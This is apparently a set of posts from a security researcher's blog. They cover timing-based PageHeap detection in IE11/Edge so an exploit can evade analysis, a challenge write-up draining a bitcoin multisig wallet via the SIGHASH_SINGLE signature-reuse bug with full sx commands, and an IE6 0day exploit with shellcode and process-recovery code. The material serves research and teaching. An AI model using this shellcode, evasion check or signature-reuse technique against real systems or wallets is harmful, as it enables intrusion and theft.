<p>As a consequence, a small allocation and a big one will be closer in time to each other than with a normal heap, given that the big one always requires VirtualAlloc.</p>
<p>These timing differences can be measured thanks to the <code class="language-plaintext highlighter-rouge">window.performance.now()</code> counter, which is available in most JavaScript engines and has a precision of microseconds (it’s reduced in some browsers because it can be abused for a big family of timing attacks, especially the ones involving the TLB).</p>
<p>Because Chrome and Firefox have their own allocator, enabling PageHeap won’t change much for them (remember that it hijacks the original malloc/free functions). In this post we will target the two other browsers that use the default allocator on Windows: IE11 and Edge.</p>
<p>Looking for functions which allocate different amount of bytes, I came across the <code class="language-plaintext highlighter-rouge">Uint8Array</code> which is a <code class="language-plaintext highlighter-rouge">TypedArray</code> using an <code class="language-plaintext highlighter-rouge">ArrayBuffer</code> underneath.</p>
<p>It’s used like <code class="language-plaintext highlighter-rouge">var buf = new Uint8Array(len)</code>. From tracing the function, both IE and Edge, when creating the ArrayBuffer, will directly call <code class="language-plaintext highlighter-rouge">msvcrt!malloc</code> with the value we specify. What a catch!</p>
<p>For the small and big values, I will be using 0x10 and 0x1000 respectively, because the big one will always trigger a call to VirtualAlloc. The method is to allocate as many <code class="language-plaintext highlighter-rouge">Uint8Array</code> objects as possible in <strong>20ms</strong>, for both small and big allocations.</p>
<p>Ok, enough, show me the code!</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">doFor</span><span class="p">(</span><span class="nx">fun</span><span class="p">,</span> <span class="nx">time</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kd">var</span> <span class="nx">store</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Array</span><span class="p">();</span>
<span class="kd">var</span> <span class="nx">startTime</span> <span class="o">=</span> <span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">();</span>
<span class="k">do</span> <span class="p">{</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">j</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="nx">j</span><span class="o"><</span><span class="mi">100</span><span class="p">;</span> <span class="nx">j</span><span class="o">++</span><span class="p">)</span>
<span class="nx">store</span><span class="p">.</span><span class="nx">push</span><span class="p">(</span><span class="nx">fun</span><span class="p">());</span>
<span class="nx">i</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span> <span class="k">while</span><span class="p">((</span><span class="nx">performance</span><span class="p">.</span><span class="nx">now</span><span class="p">()</span> <span class="o">-</span> <span class="nx">startTime</span><span class="p">)</span> <span class="o"><</span> <span class="nx">time</span><span class="p">);</span>
<span class="k">return</span> <span class="nx">i</span><span class="p">;</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">allocPageBA</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="k">new</span> <span class="nb">Uint8Array</span><span class="p">(</span><span class="mh">0x1000</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">function</span> <span class="nx">allocSmallBA</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="k">new</span> <span class="nb">Uint8Array</span><span class="p">(</span><span class="mh">0x10</span><span class="p">);</span>
<span class="p">}</span>
<span class="kd">var</span> <span class="nx">bigRet</span> <span class="o">=</span> <span class="nx">doFor</span><span class="p">(</span><span class="nx">allocPageBA</span><span class="p">,</span> <span class="nx">ALLOC_TIME</span><span class="p">);</span>
<span class="kd">var</span> <span class="nx">smallRet</span> <span class="o">=</span> <span class="nx">doFor</span><span class="p">(</span><span class="nx">allocSmallBA</span><span class="p">,</span> <span class="nx">ALLOC_TIME</span><span class="p">);</span>
<span class="nx">alert</span><span class="p">(</span><span class="nx">bigRet</span><span class="p">);</span>
<span class="nx">alert</span><span class="p">(</span><span class="nx">smallRet</span><span class="p">);</span>
</code></pre></div></div>
<p>Now, this is a little inconvenient because we are introducing other allocations while we measure allocations.</p>
<p>To resolve that piece of error-inducing code, I created an object that pre-allocates an Array and then stores the objects in it, thus not generating new allocations.</p>
<p>Also, notice that I’m keeping the allocated objects alive to prevent the garbage collector from kicking in and freeing them, which would introduce another error into the measurements.</p>
<div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">function</span> <span class="nx">NoAllocStore</span><span class="p">(</span><span class="nx">count</span><span class="p">)</span> <span class="p">{</span>
<span class="k">this</span><span class="p">.</span><span class="nx">count</span> <span class="o">=</span> <span class="nx">count</span><span class="p">;</span>
<span class="k">this</span><span class="p">.</span><span class="nx">array</span> <span class="o">=</span> <span class="k">new</span> <span class="nb">Array</span><span class="p">(</span><span class="nx">count</span><span class="p">);</span>
<span class="k">for</span><span class="p">(</span><span class="kd">var</span> <span class="nx">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="nx">i</span><span class="o"><</span><span class="nx">count</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
<span class="k">this</span><span class="p">.</span><span class="nx">array</span><span class="p">[</span><span class="nx">i</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x41414141</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">this</span><span class="p">.</span><span class="nx">index</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="nx">NoAllocStore</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">store</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">obj</span><span class="p">)</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">index</span> <span class="o">>=</span> <span class="k">this</span><span class="p">.</span><span class="nx">count</span><span class="p">)</span> <span class="p">{</span>
<span class="nx">alert</span><span class="p">(</span><span class="dl">"</span><span class="s2">bad</span><span class="dl">"</span><span class="p">);</span>
<span class="k">throw</span> <span class="kc">false</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">this</span><span class="p">.</span><span class="nx">array</span><span class="p">[</span><span class="k">this</span><span class="p">.</span><span class="nx">index</span><span class="p">]</span> <span class="o">=</span> <span class="nx">obj</span><span class="p">;</span>
<span class="k">this</span><span class="p">.</span><span class="nx">index</span><span class="o">++</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The final code is <a href="https://github.com/snf/exploit/blob/master/anomalies/pageheap/detect.html">here</a>. I ran it a few times (250 to be exact) and compared the distribution of what I got in both browsers with PageHeap disabled and enabled.</p>
<p>The distribution I got in IE11 was:</p>
<p><img src="http://snf.github.io/public/data/pageheap/ie11.png" alt="IE11 count of small allocations/count of big allocations" /></p>
<p>In more detail to see when the distributions start mixing:</p>
<p><img src="http://snf.github.io/public/data/pageheap/ie11_zoom.png" alt="IE11 count of small allocations/count of big allocations zoomed" /></p>
<p>It’s very visible that the PageHeap-enabled one has a denser distribution and hence is more deterministic in allocation time. This can be attributed to the page allocation being much more expensive in time than the heap allocation, making other parts of the code less influential on the overall timing.</p>
<p>As homework, fellow hacker, you might want to measure the number of total instructions executed (ring0 and ring3) after each <code class="language-plaintext highlighter-rouge">malloc</code> call using a system emulator or debugger.</p>
<p>For Edge, the distributions have a similar shape, but you can notice that they are much more separated, and 3x is a conservative and very good number to draw the line at:</p>
<p><img src="http://snf.github.io/public/data/pageheap/edge.png" alt="Edge count of small allocations/count of big allocations" /></p>
<p>I will set the limit at 2x for IE and 3x for Edge, and anything under this limit will be classified as PageHeap enabled. The other cases will be <strong>assumed</strong> safe for execution.</p>
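<p>Putting the measurements together, the final decision can be sketched like this (the 2x/3x cut-offs come from the distributions above; the function name and browser flag are illustrative):</p>

```javascript
// Classify by how many small vs. big allocations fit in the same time window.
// smallCount / bigCount collapses toward 1 under PageHeap, because every
// allocation, small or big, pays the VirtualAlloc round-trip.
function looksLikePageHeap(smallCount, bigCount, isEdge) {
  const ratio = smallCount / bigCount;
  const limit = isEdge ? 3 : 2; // conservative per-browser cut-offs
  return ratio < limit;
}

// Numbers in the spirit of the measurements: a normal heap serves small
// allocations far faster than page-sized ones; PageHeap does not.
console.log(looksLikePageHeap(50000, 8000, false)); // false: ~6x ratio, assume safe
console.log(looksLikePageHeap(9000, 8000, false));  // true: ~1.1x ratio, abort
```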
<p>You can check your IE or Edge browser with this file <a href="http://snf.github.io/public/data/pageheap/detect.html">detect.html</a> and ping me back if you are getting different results. Also, if you are interested, the code used for retrieving and analysing the data is at <a href="https://github.com/snf/exploit/tree/master/anomalies/pageheap">https://github.com/snf/exploit/tree/master/anomalies/pageheap</a>.</p>
<h3 id="conclusion">Conclusion</h3>
<p>It has been demonstrated that with <strong>40ms</strong> you can run a quick test to determine whether PageHeap is present and whether it’s worth continuing with the exploit or not.</p>
<p>Thanks for reading, if you have any extra information or know of a better method, please let me know. Also stay tuned for future posts on detecting other tools.</p>
<ul>
<li>Follow me on Twitter: <a href="https://twitter.com/snfernandez">@snfernandez</a></li>
<li>Contact me at Gmail: sebanfernandez</li>
<li>Secure is better: <a href="http://snf.github.io/public/data/sebanfernandez_0xEB1C845F_pub.asc">GPG Key</a></li>
</ul>
<h3 id="warranties">Warranties</h3>
<p>This is an experiment and by no means should you trust it without running further tests under different CPUs and virtualization technologies. Remember, this is one of those ItWorksInMyPC(TM) projects.</p>
<p>I take no blame if your exploit is executed by a honeypot, the bug patched and you make the news for APTing people.</p>
Coinspect OP_CHECKSIG challenge2014-08-06T00:00:00+00:00http://snf.github.io/2014/08/06/coinspect-op_checksig-challenge<h3 id="introduction">Introduction</h3>
<p>The challenge from
<a href="http://blog.coinspect.co/copay-wallet-emptying-vulnerability">Coinspect</a>
and <a href="http://www.ekoparty.org/">Ekoparty conference</a> consisted of
taking the bitcoins from a multisig or p2sh (pay to script hash)
wallet:
<a href="https://blockchain.info/address/32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe">https://blockchain.info/address/32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe</a></p>
<p>I’m keeping this post as short as possible; to understand it,
you may need previous knowledge of bitcoin internals.</p>
<h3 id="understanding-op_checksig-opcode">Understanding OP_CHECKSIG opcode</h3>
<p>This is a fuzzy and complicated part of validating bitcoin
transactions. It’s explained
<a href="https://bitcointalk.org/index.php?topic=260595.0">here</a>.</p>
<p>When OP_CHECKSIG is reached in a script, it requires the public key and the signature to be on the stack. It takes the hash type from the signature’s last byte and, depending on it, takes a specific approach to verifying the signature.</p>
<p>Internally, this opcode takes the serialized transaction, strips parts of it depending on the hash type, hashes it, and then verifies that the signature is valid for that hash and for the public key provided on the stack.</p>
<p>In this challenge a P2SH address is provided. It means that the
scriptSig consists of many signatures and a redeem script.</p>
<p>This redeem script contains the public keys that can be used and how many of them are necessary to validate the script. In this example it needs 2 of 3:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{2 [pubkey1] [pubkey2] [pubkey3] 3 OP_CHECKMULTISIG}
</code></pre></div></div>
<p>The OP_CHECKMULTISIG opcode runs OP_CHECKSIG for every signature provided. If all those signatures are good, it returns True. If any of them fails, it returns False.</p>
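<p>A simplified model of that validation loop (the <code class="language-plaintext highlighter-rouge">checkSig</code> callback stands in for real ECDSA verification, and the names here are illustrative):</p>

```javascript
// Simplified 2-of-3 OP_CHECKMULTISIG: every provided signature must verify
// against one of the public keys, consuming keys strictly left to right
// (which is why signatures must appear in the same order as the keys).
function checkMultiSig(signatures, pubkeys, required, checkSig) {
  let sigIdx = 0;
  for (let keyIdx = 0; keyIdx < pubkeys.length && sigIdx < signatures.length; keyIdx++) {
    if (checkSig(signatures[sigIdx], pubkeys[keyIdx])) {
      sigIdx++; // this signature matched, move on to the next one
    }
  }
  // True only if every signature found a key and the quorum was provided.
  return sigIdx === signatures.length && signatures.length >= required;
}

// Toy example: a "signature" here is just the name of the key it matches.
const check = (sig, key) => sig === key;
console.log(checkMultiSig(["k1", "k3"], ["k1", "k2", "k3"], 2, check)); // true
console.log(checkMultiSig(["k3", "k1"], ["k1", "k2", "k3"], 2, check)); // false: out of order
```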
<h3 id="bug-in-sighash_single">Bug in SIGHASH_SINGLE</h3>
<p>In case the signature ends with <strong>03</strong>, SIGHASH_SINGLE mode is chosen.</p>
<p>This mode is supposed to strip the outputs that don’t correspond to the same index as the input before hashing the transaction and checking that the signature is valid.</p>
<p>The problem is that SIGHASH_SINGLE is supposed to sign only one output: the one at the same index as this input. If there are fewer outputs than inputs, it should probably fail. But because of a bug in the initial implementation of bitcoind, the transaction was still validated, with a hardcoded hash being signed instead.</p>
<p>The bitcoin wiki describes that if there is no output at the same index as the input, then the transaction hash assumed to be signed is
“0000000000000000000000000000000000000000000000000000000000000001”
(there is a whole thread about this behavior <a href="https://bitcointalk.org/index.php?topic=260595.0">here</a>). This defeats the point of the signature, because neither the inputs nor the outputs are signed; a hard-coded string is signed instead.</p>
<p>It means that this signature can be reused any time we need to sign 000..01 again.</p>
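<p>The buggy hash selection can be sketched as follows (simplified; <code class="language-plaintext highlighter-rouge">realSighash</code> stands in for bitcoind’s actual serialize-strip-and-hash path, and the names are illustrative):</p>

```javascript
// Simplified model of the SIGHASH_SINGLE quirk in early bitcoind.
const ONE_HASH =
  "0000000000000000000000000000000000000000000000000000000000000001";

function sighashSingle(tx, inputIndex, realSighash) {
  if (inputIndex >= tx.outputs.length) {
    // Bug: instead of failing, the value that gets signed is the constant 1.
    // A signature over this constant is valid for ANY such input, in ANY tx.
    return ONE_HASH;
  }
  return realSighash(tx, inputIndex);
}

const tx = { inputs: ["in0", "in1", "in2"], outputs: ["out0"] };
// Inputs 1 and 2 have no matching output, so both "sign" the same constant:
console.log(sighashSingle(tx, 1, null) === sighashSingle(tx, 2, null)); // true
```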
<h3 id="the-challenge">The challenge</h3>
<p>Going back to the Coinspect’s wallet
32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe, we detect that there is already an
outgoing transaction:
<a href="https://blockchain.info/tx/6102bfd4bad33443bcb99765c0751b6b8e4e65f4db4e3b65324c5e9e3dac8132">6102bfd4bad33443bcb99765c0751b6b8e4e65f4db4e3b65324c5e9e3dac8132</a>.</p>
<p>The sigScript from the third input of the transaction:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0
3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903
304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803
5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae
</code></pre></div></div>
<p>So we start analyzing the inputs and detect that they are multisigned
(2 of 3) and, as the signatures end with <strong>03</strong>, they correspond to
SIGHASH_SINGLE mode.</p>
<p>The last input doesn’t have a corresponding output, which means that the
last input’s signatures sign the hash 000..01, so we can reuse those same
signatures whenever we need to sign the hardcoded hash again.</p>
<p>With that signature we can sign any input whose index is greater than or
equal to the number of outputs. Since we are using one output, the input at
index 0 must come from outside that address, because we cannot reuse the
signatures for it. So we add an input from an address we control, with the
smallest amount possible.</p>
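<p>That eligibility rule can be written down directly (function name illustrative):</p>

```javascript
// A SIGHASH_SINGLE signature over the constant hash is reusable exactly for
// the inputs that have no output at the same index.
function reusableInputs(inputCount, outputCount) {
  const reusable = [];
  for (let i = 0; i < inputCount; i++) {
    if (i >= outputCount) reusable.push(i); // no matching output: signs 000..01
  }
  return reusable;
}

// 3 inputs, 1 output: index 0 needs a real signature, 1 and 2 can reuse.
console.log(reusableInputs(3, 1)); // [ 1, 2 ]
```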
<h3 id="taking-the-bitcoins">Taking the bitcoins</h3>
<p>I’m using sx for the solution.</p>
<p>Create a new transaction with the first input from an address I
control and the other two inputs from Coinspect’s wallet:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sx mktx txfile.tx -i 2073da15a26ac66043914f5d3936058565318b332e793719456cc0405c87b450:0 -i 969bfb1704f1dc8e6157bf56ea794e16e6d9b88ca5cbff6e12d0797400b8835c:1 -i 9bf39fbf0f89c869585fb59acb2bfec5e2f57069b81021b967a7269a2c873f63:0 -o 197iAesReT4Z6chRqnsficr3LQpVxBdv1J:3100000
Added input 2073da15a26ac66043914f5d3936058565318b332e793719456cc0405c87b450:0
Added input 969bfb1704f1dc8e6157bf56ea794e16e6d9b88ca5cbff6e12d0797400b8835c:1
Added input 9bf39fbf0f89c869585fb59acb2bfec5e2f57069b81021b967a7269a2c873f63:0
Added output sending 3100000 Satoshis to 197iAesReT4Z6chRqnsficr3LQpVxBdv1J.
</code></pre></div></div>
<p>Create the script for the first input, signing it and adding my
public key:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ DECODED_ADDR=$(cat private.key | sx addr | sx decode-addr)
$ PREVOUT_SCRIPT=$(sx rawscript dup hash160 [ $DECODED_ADDR ] equalverify checksig)
$ SIGNATURE=$(cat private.key | sx sign-input txfile.tx 0 $PREVOUT_SCRIPT)
$ SCRIPT=$(sx rawscript [ $SIGNATURE ] [ $(cat private.key | sx pubkey) ])
$ sx set-input txfile.tx 0 $SCRIPT > signed-tx
</code></pre></div></div>
<p>Now I will add the reused signature for the other two inputs. Those
inputs don’t have a corresponding output, so they only need to sign
000..01, for which we already have the signature (remember the third
input from the previous transaction?):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ SIGN_1=3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903
$ SIGN_2=304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803
$ REDEEM_SCRIPT=5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae
$ REUSED_SCRIPT=$(sx rawscript zero [ $SIGN_1 ] [ $SIGN_2 ] [ $REDEEM_SCRIPT ])
$ sx set-input signed-tx 1 $REUSED_SCRIPT > signed-tx2
$ sx set-input signed-tx2 2 $REUSED_SCRIPT > signed-tx_final
</code></pre></div></div>
<p>So now we have the transaction complete and ready to broadcast. I did
it on blockr.io because blockchain.info was complaining about the script
containing 4 instructions instead of 2.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ cat signed-tx_final
010000000350b4875c40c06c451937792e338b3165850536395d4f914360c66aa215da7320000000008a473044022043dfdc32cbe03f06200d4f1da806336cb79565c482432e60a6ad0c55dbb5947b02201cd22de62cf8ffc09288ff87ccac93038978e4d9d746b41bfb07614ce161f472014104e824c125eb482debade1f47f0225959b0e15fc667fd281b8e1cc99e08a5ab2285583d6fdcc6b61906d454249a76e666bd03e883df017054a04cc77d1b7dce92dffffffff5c83b8007479d0126effcba58cb8d9e6164e79ea56bf57618edcf10417fb9b9601000000fdfd0000483045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c290347304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b8034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53aeffffffff633f872c9a26a767b92110b86970f5e2c5fe2bcb9ab55f5869c8890fbf9ff39b00000000fdfd0000483045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c290347304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b8034c695221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53aeffffffff01604d2f00000000001976a9145905ddb52ed55abc9f8f4a58a8323296c642e93288ac00000000
$ sx showtx signed-tx_final
hash: 32aadcd309ea3fb30bd9490ee6417e378dad5111c21563ce532a6917b776051b
version: 1
locktime: 0
Input:
previous output: 2073da15a26ac66043914f5d3936058565318b332e793719456cc0405c87b450:0
script: [ 3044022043dfdc32cbe03f06200d4f1da806336cb79565c482432e60a6ad0c55dbb5947b02201cd22de62cf8ffc09288ff87ccac93038978e4d9d746b41bfb07614ce161f47201 ] [ 04e824c125eb482debade1f47f0225959b0e15fc667fd281b8e1cc99e08a5ab2285583d6fdcc6b61906d454249a76e666bd03e883df017054a04cc77d1b7dce92d ]
sequence: 4294967295
address: 16LvhDHHrcGXEeHtYu6W99kwptuS6Vp59B
Input:
previous output: 969bfb1704f1dc8e6157bf56ea794e16e6d9b88ca5cbff6e12d0797400b8835c:1
script: zero [ 3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903 ] [ 304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803 ] [ 5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae ]
sequence: 4294967295
address: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe
Input:
previous output: 9bf39fbf0f89c869585fb59acb2bfec5e2f57069b81021b967a7269a2c873f63:0
script: zero [ 3045022100dfcfafcea73d83e1c54d444a19fb30d17317f922c19e2ff92dcda65ad09cba24022001e7a805c5672c49b222c5f2f1e67bb01f87215fb69df184e7c16f66c1f87c2903 ] [ 304402204a657ab8358a2edb8fd5ed8a45f846989a43655d2e8f80566b385b8f5a70dab402207362f870ce40f942437d43b6b99343419b14fb18fa69bee801d696a39b3410b803 ] [ 5221023927b5cd7facefa7b85d02f73d1e1632b3aaf8dd15d4f9f359e37e39f05611962103d2c0e82979b8aba4591fe39cffbf255b3b9c67b3d24f94de79c5013420c67b802103ec010970aae2e3d75eef0b44eaa31d7a0d13392513cd0614ff1c136b3b1020df53ae ]
sequence: 4294967295
address: 32GkPB9XjMAELR4Q2Hr31Jdz2tntY18zCe
Output:
value: 3100000
script: dup hash160 [ 5905ddb52ed55abc9f8f4a58a8323296c642e932 ] equalverify checksig
address: 197iAesReT4Z6chRqnsficr3LQpVxBdv1J
</code></pre></div></div>
<p>You can check the transaction and its details <a href="http://webbtc.com/tx/0db11d06a139756d7f9d4a9257a3fbbb64256d0d7b88d08507872edb228996d3">here</a>.</p>
<p>Thanks for reading!</p>
Process continuation after exploit (aka. IE is my process launcher)2010-11-15T00:00:00+00:00http://snf.github.io/2010/11/15/process-continuation-after-exploit<p>This is an old post from one of my old blogs so reposting here for eternity (not one of the most elegant teks, looking at you Seba from the past).</p>
<p>Last week another 0day was discovered in the wild exploiting Internet Explorer. As the bug wasn’t hard
to trigger/exploit in IE 6, I thought it would be good to add another decoration to this exploit.
Last week I was also talking to some friends about why exploit writers are not interested in recovering the process (or why they don’t do it), so I decided to write this post.
Here I will describe how to make IE6 continue running after it has been successfully exploited using the latest 0day bug.</p>
<p>The trigger for the bug is: <code class="language-plaintext highlighter-rouge"><table style="position: absolute; clip: rect(0);"></code></p>
<p>When we trigger the bug we see that we are using a defaced vtable; in my IE, I see that the jump comes from <code class="language-plaintext highlighter-rouge">EnsureDispNodeBackground</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000> ub 7dcb1c3f
mshtml!CLayout::EnsureDispNodeBackground+0x81:
7dcb1c2d 33f6 xor esi,esi
7dcb1c2f 46 inc esi
7dcb1c30 56 push esi
7dcb1c31 8bcf mov ecx,edi
7dcb1c33 e813e2ffff call mshtml!CDispNode::SetBackground (7dcafe4b)
7dcb1c38 8b07 mov eax,dword ptr [edi] ;<-- pointer to chaos
7dcb1c3a 8bcf mov ecx,edi
7dcb1c3c ff5030 call dword ptr [eax+30h]
</code></pre></div></div>
<p>As you can see, the object is in edi, so it takes the vtable from object[0] and then dereferences vtable+0x30 to get the function.</p>
<p>After some research, I discovered that the vtable address was being overwritten by the function <code class="language-plaintext highlighter-rouge">CDispNode::SetUserClip</code> when trying to set a flag on a miscalculated address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mshtml!CDispNode::SetUserClip+0x84:
7dd8b5d0 e8b4ddffff call mshtml!CRect::RestrictRange (7dd89389)
7dd8b5d5 8b4704 mov eax,dword ptr [edi+4]
7dd8b5d8 23c6 and eax,esi
7dd8b5da 0fb688101cc37d movzx ecx,byte ptr mshtml!CDispNode::_extraSizeTable (7dc31c10)[eax]
7dd8b5e1 8bc7 mov eax,edi
7dd8b5e3 c1e102 shl ecx,2
7dd8b5e6 2bc1 sub eax,ecx
7dd8b5e8 830801 or dword ptr [eax],1 ;<-- the address of the vtable is on *eax
</code></pre></div></div>
<p>The main idea of auto-recovering exploits is that we can give the process the same state it had before being exploited, and this bug is perfect for that!
The only corruption we have when the bug is triggered is 1 bit (afaik). We don’t really know if the vtable of the object is used again, but we are going to fix it anyway and set eax to 0 (the function failed).</p>
<p>I used this shellcode: <a href="http://code.google.com/p/w32-exec-calc-shellcode/">w32-exec-calc-shellcode</a>. Greets to berendjanwever for being first on Google when searching for calc shellcode and having a working one; you deserve the mention!
I have not made any modifications to it, just added a prologue and an epilogue to save/restore the state.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>BITS 32
;;; lets patch vtable address
and dword [edi], 0xFFFFFFFE
;;; save registers
pushad
;;; push a mark on the stack
;;; (lazy stack recovery after the payload is executed)
push 0xdead1337
;; here starts the shellcode for launching the calculator
;; ============================================
xor esi,esi
push esi
mov esi,[fs:esi+0x30]     ; esi = PEB
mov esi,[esi+0xc]         ; esi = PEB->Ldr
mov esi,[esi+0x1c]        ; first entry of InInitializationOrderModuleList
l1:
mov ebp,[esi+0x8]         ; ebp = module base address
mov esi,[esi]             ; advance to the next module
mov ebx,[ebp+0x3c]        ; offset of the PE header
mov ebx,[ebp+ebx+0x78]    ; RVA of the export directory
add ebx,ebp               ; ebx = export directory
mov ecx,[ebx+0x18]        ; ecx = number of exported names
jcxz l1                   ; no exports: try the next module
l2:
mov edi,[ebx+0x20]        ; RVA of the name pointer table
add edi,ebp
mov edi,[edi+ecx*4-0x4]   ; RVA of the ecx-th name
add edi,ebp               ; edi = exported function name
xor eax,eax
cdq
l3:
xor dl,[edi]              ; hash the name byte by byte
ror dx,0x1
scasb
jnz l3
cmp dx,0xf510             ; hash of "WinExec"
loopne l2                 ; no match: try the previous name
jnz l1                    ; names exhausted: next module
mov edx,[ebx+0x24]        ; ordinal table
add edx,ebp
movzx edx,word [edx+ecx*2]
mov edi,[ebx+0x1c]        ; function address table
add edi,ebp
add ebp,[edi+edx*4]       ; ebp = address of WinExec
push dword 0x6578652e     ; ".exe"
push dword 0x636c6163     ; "calc"
push esp                  ; pointer to "calc.exe"
xchg eax,[esp]
push eax
call ebp                  ; WinExec("calc.exe", ...)
;; ============================================
;;; then recover stack, search for our mark
l10:
pop eax
cmp eax, 0xdead1337
jne l10
;;; restore registers
popad
;;; return from the function with error
xor eax,eax
;;; if the function had arguments we should clean them
;;; depending on the calling convention (not here :-) )
ret
;;; should never reach this point
int3
</code></pre></div></div>
<p>As we can see, recovering from the exploit is not difficult for this bug. It could be considerably harder, though, with other bugs that cause more memory corruption.</p>
<p>The final working exploit is here: <a href="http://snf.github.io/public/data/ie_clip.html">ie_clip.html</a> (open at your own risk ;-) ).</p>
<p>And the demo (for non-believers) showing the exploit working three times with Internet Explorer still running: <a href="http://www.youtube.com/watch?v=dgV9q9Cw0PU">http://www.youtube.com/watch?v=dgV9q9Cw0PU</a>.</p>
<p>Interesting slides about process continuation:
<a href="http://www.immunitysec.com/downloads/skylar_cansecwest09.pdf">User Friendly Exploits</a></p>
<p>Greetz to all my friends and coworkers.
And sorry to all of you who were expecting a Spanish post.</p>